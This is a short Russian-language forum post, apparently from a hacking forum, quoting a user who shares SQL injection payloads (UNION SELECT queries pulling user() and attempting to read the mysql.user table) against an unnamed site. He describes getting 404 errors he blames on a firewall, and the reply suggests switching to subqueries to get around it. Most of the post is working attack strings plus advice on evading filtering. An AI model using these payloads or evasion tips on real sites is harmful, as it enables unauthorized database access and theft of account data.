12.08.2014, 09:22
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от MaxFast
Есть одна инъекция.
Код:
/-1'+union+select+1,2,3,4,user(),6,7,8,9,10+--+
Отлично выводит пользователя.
Код:
-1'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql.user+--+
Ответ - 404 Not Found
Тогда я подумал подставить валидное значение
Код:
-45742'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql.user+--+
Ответ - 404 Not Found
Все дальнейшие запросы кроме user(), database(), version() отвечают ошибкой 404.
Тогда я подумал что это WAF. И загрязнил запрос стандартными комментариями.
Ответ - 404 Not Found
Вообще любые запросы отвечают 404.
Что это может быть? Попробуй использовать подзапросы.
|
|
|